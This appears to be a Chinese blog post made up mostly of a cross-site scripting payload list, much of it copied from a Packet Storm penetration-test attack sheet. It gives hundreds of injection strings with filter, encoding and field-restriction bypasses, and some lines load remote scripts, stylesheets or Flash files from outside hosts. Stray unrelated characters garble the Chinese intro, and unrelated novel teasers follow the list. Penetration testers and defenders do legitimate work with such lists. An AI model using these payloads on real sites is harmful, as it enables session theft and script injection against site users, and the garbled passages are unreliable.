XSS Payload

XSS 重要的是根據(jù)輸出來(lái)判斷過(guò)濾器的規(guī)則陈惰，F(xiàn)12，構(gòu)造自己的XSS Payload拓瞪，分割优妙，關(guān)閉括號(hào)，錯(cuò)誤后判斷過(guò)濾規(guī)則梳庆，尋找繞過(guò)

1.最簡(jiǎn)單：
<script>alert(1)</script>

2.簡(jiǎn)單URL編碼：
%22><img src=1 onerror =alert(/XSS/);>

3.過(guò)濾<,>
javascript:alert(1)
"onmouseover="alert(1)

定義和用法
onmouseover 事件會(huì)在鼠標(biāo)指針移動(dòng)到指定的對(duì)象上時(shí)發(fā)生暖途。
語(yǔ)法

onmouseover="alert(1)"

4.跳出
view plaincopyprint onmouseover=alert(1)

常用的payloads：
<img src=1onmouseover=alert(1)>
<a herf=1onload=alert(1)>xx</a>
<body/onhashchange=alert(1)><ahref=#>clickit (當(dāng)錨出現(xiàn)變化時(shí)觸發(fā)彈框)
<objectdata=”data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4=”></object>
“><svg/onload=alert(/1/)>
Input標(biāo)簽xss(autofocus自動(dòng)觸發(fā)，注意屬性hidden時(shí)膏执，無(wú)法觸發(fā))
112" name=javascript:alert(1)autofocus onfocus=location=this.name
112" name=javascript:alert1autofocus onfocus=location=this.name

https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html

Note: This is a technical attack sheet for cross site penetrationtests.

Cross Site Scripting Strings with TAG:

<a href="about:<script>document.cookie=true;</script>">
<body onload="document.cookie=true;">
<div style="background-image: url(javascript:document.cookie=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<script>document.cookie=true;</script>

<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with close TAG:

"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
"<SCRIPT>document.cookie=true;</SCRIPT>
"<IMG SRC="jav ascript:document.cookie=true;">
"<IMG SRC="javascript:document.cookie=true;">
"<IMG SRC=" ? javascript:document.cookie=true;">
"<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
"<SCRIPT>document.cookie=true;//<</SCRIPT>
"<SCRIPT <B>document.cookie=true;</SCRIPT>
"<IMG SRC="javascript:document.cookie=true;">
"<iframe src="javascript:document.cookie=true;>
"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
"<BODY BACKGROUND="javascript:document.cookie=true;">
"<BODY ONLOAD=document.cookie=true;>
"<IMG DYNSRC="javascript:document.cookie=true;">
"<IMG LOWSRC="javascript:document.cookie=true;">
"<BGSOUND SRC="javascript:document.cookie=true;">
"<BR SIZE="&{document.cookie=true}">
"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
"?script?document.cookie=true;?/script?
"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
"<TABLE BACKGROUND="javascript:document.cookie=true;">
"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
"<DIV STYLE="background-image: url(?javascript:document.cookie=true;)">
"<DIV STYLE="width: expression(document.cookie=true);">
"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
"<IMG STYLE="CrossSiteScripting:expr/CrossSiteScripting/ession(document.cookie=true)">
"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
"exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
"<SCRIPT>document.cookie=true;</SCRIPT>
"<BASE HREF="javascript:document.cookie=true;//">
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
"<a href="javascript#document.cookie=true;">
"<div onmouseover="document.cookie=true;">
"![](javascript:document.cookie=true;)
"![](javascript:document.cookie=true;)
"<input type="image" dynsrc="javascript:document.cookie=true;">
"<bgsound src="javascript:document.cookie=true;">
"&<script>document.cookie=true;</script>
"&{document.cookie=true;};
"<img src=&{document.cookie=true;};>
"<link rel="stylesheet" href="javascript:document.cookie=true;">
"

"

"<a href="about:<script>document.cookie=true;</script>">
"<body onload="document.cookie=true;">
"<div style="background-image: url(javascript:document.cookie=true;);">
"<div style="behaviour: url([link to code]);">
"<div style="binding: url([link to code]);">
"<div style="width: expression(document.cookie=true;);">
"<style type="text/javascript">document.cookie=true;</style>
"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
"<style></script>
"<<script>document.cookie=true;</script>
"<script>document.cookie=true;//--></script>
"<script>document.cookie=true;</script>
"

"<img src="blah>" onmouseover="document.cookie=true;">
"<xml src="javascript:document.cookie=true;">
"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with negative value & TAG:
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC=" ? javascript:document.cookie=true;">
-1<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;>
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
-1?script?document.cookie=true;?/script?
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url(?javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/CrossSiteScripting/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
-1exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1![](javascript:document.cookie=true;)
-1![](javascript:document.cookie=true;)
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script>
-1&{document.cookie=true;};
-1<img src=&{document.cookie=true;};>
-1<link rel="stylesheet" href="javascript:document.cookie=true;">
-1

-1

-1<a href="about:<script>document.cookie=true;</script>">
-1<body onload="document.cookie=true;">
-1<div style="background-image: url(javascript:document.cookie=true;);">
-1<div style="behaviour: url([link to code]);">
-1<div style="binding: url([link to code]);">
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<script>document.cookie=true;</script>
-1

-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings Restriction Bypass Mail:

"<iframe src=http://vulnerability-lab.com/>@gmail.com
"<script>alert(document.cookie)</script><div style="1@gmail.com
"<script>alert(document.cookie)</script>@gmail.com

Cross Site Scripting Strings Restriction Bypass Phone:
+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
<iframe src=http://vulnerability-lab.com>1337+1

Cross Site Scripting Strings Restriction Bypass Obfuscation

“<ScriPt>ALeRt("VlAb")</scriPt>
"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>

Cross Site Scripting Strings Restriction Bypass String to Charcode

<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
'';!--"<CrossSiteScripting>=&{()}

Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E

Cross Site Scripting Strings via Console:
set vlan name 1337 <script>alert(document.cookie)</script>
set system name <iframe src=http://www.vulnerability-lab.com>
set system location "><iframe src=a onload=alert("VL") <
set system contact <script>alert('VL')</script>

insert <script>alert(document.cookie)</script>
add
add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com

add topic <iframe src=http://www.vulnerability-lab.com>
add name <script>alert('VL')</script>

perl -e 'print "<IMG SRC=java\0script:alert("CrossSiteScripting")>";' > out
perl -e 'print "<SCR\0IPT>alert("CrossSiteScripting")</SCR\0IPT>";' > out

Cross Site Scripting Strings on per line validation applications:

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"

Cross Site Scripting Strings Embed:

Cross Site Scripting Strings Action Script:

   <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
       <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
             <param name="quality" value="high" />
             <param name="scale" value="noscale" />
             <param name="salign" value="LT" />
   <param name="allowScriptAccess" value="always" />
             <param name="menu" value="false" />
        </object>

<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
<<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
<SCRIPT SRC=//vulnerability-lab.com/.js>
<SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT a=> SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
</TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>

<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert("CrossSiteScripting")>
<IMG SRC=javascript:alert("RM'CrossSiteScripting'")>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav
ascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=" ? javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="http://vulnerability-lab.com/CrossSiteScripting.css; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-

<STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>

<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("CrossSiteScripting")>
<iframe src=http://vulnerability-lab.com/index.html <

<A >CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>

";alert('CrossSiteScripting');//

?script?alert(￠CrossSiteScripting￠)?/script?

a="get";
b="URL("";
c="javascript:";
d="alert('CrossSiteScripting');")";
eval(v+l+a+b);

<HTML xmlns:CrossSiteScripting>
<?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
<CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
</BODY></HTML>

<? echo('<SCR)';
echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+

最后編輯于：2017.12.05 03:51:16

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末驻售，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子更米，更是在濱河造成了極大的恐慌欺栗，老刑警劉巖，帶你破解...
沈念sama閱讀 221,548評(píng)論 6贊 515
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件征峦，死亡現(xiàn)場(chǎng)離奇詭異迟几，居然都是意外死亡，警方通過(guò)查閱死者的電腦和手機(jī)栏笆，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 94,497評(píng)論 3贊 399
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門(mén)类腮，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)，“玉大人蛉加，你說(shuō)我怎么就攤上這事蚜枢。” “怎么了针饥？”我有些...
開(kāi)封第一講書(shū)人閱讀 167,990評(píng)論 0贊 360
道士緝兇錄：失蹤的賣(mài)姜人
文/不壞的土叔我叫張陵厂抽，是天一觀的道長(zhǎng)。經(jīng)常有香客問(wèn)我丁眼，道長(zhǎng)筷凤，這世上最難降的妖魔是什么？我笑而不...
開(kāi)封第一講書(shū)人閱讀 59,618評(píng)論 1贊 296
?港島之戀（遺憾婚禮）
正文為了忘掉前任苞七，我火速辦了婚禮藐守，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘蹂风。我一直安慰自己吗伤，他們只是感情好，可當(dāng)我...
茶點(diǎn)故事閱讀 68,618評(píng)論 6贊 397
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開(kāi)白布硫眨。她就那樣靜靜地躺著足淆，像睡著了一般巢块。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上巧号，一...
開(kāi)封第一講書(shū)人閱讀 52,246評(píng)論 1贊 308
城市分裂傳說(shuō)
那天族奢，我揣著相機(jī)與錄音，去河邊找鬼丹鸿。笑死越走，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的靠欢。我是一名探鬼主播廊敌，決...
沈念sama閱讀 40,819評(píng)論 3贊 421
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開(kāi)眼，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼门怪！你這毒婦竟也來(lái)了骡澈？” 一聲冷哼從身側(cè)響起，我...
開(kāi)封第一講書(shū)人閱讀 39,725評(píng)論 0贊 276
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤掷空，失蹤者是張志新（化名）和其女友劉穎肋殴，沒(méi)想到半個(gè)月后，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體坦弟，經(jīng)...
沈念sama閱讀 46,268評(píng)論 1贊 320
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡护锤，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 38,356評(píng)論 3贊 340
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了酿傍。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片烙懦。...
茶點(diǎn)故事閱讀 40,488評(píng)論 1贊 352
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖赤炒，靈堂內(nèi)的尸體忽然破棺而出氯析，到底是詐尸還是另有隱情，我是刑警寧澤可霎，帶...
沈念sama閱讀 36,181評(píng)論 5贊 350
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布，位于F島的核電站宴杀，受9級(jí)特大地震影響癣朗，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜旺罢，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,862評(píng)論 3贊 333
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一旷余、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧扁达，春花似錦正卧、人聲如沸。這莊子的主人今日做“春日...
開(kāi)封第一講書(shū)人閱讀 32,331評(píng)論 0贊 24
一樁弒父案炉旷，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)。三九已至，卻和暖如春窘行，著一層夾襖步出監(jiān)牢的瞬間饥追，已是汗流浹背。一陣腳步聲響...
開(kāi)封第一講書(shū)人閱讀 33,445評(píng)論 1贊 272
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工罐盔，沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留但绕，地道東北人。一個(gè)月前我還...
沈念sama閱讀 48,897評(píng)論 3贊 376
代替公主和親
正文我出身青樓惶看，卻偏偏與公主長(zhǎng)得像捏顺，于是被迫代替她去往敵國(guó)和親。傳聞我的和親對(duì)象是個(gè)殘疾皇子纬黎，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 45,500評(píng)論 2贊 359

XSS Payload

推薦閱讀更多精彩內(nèi)容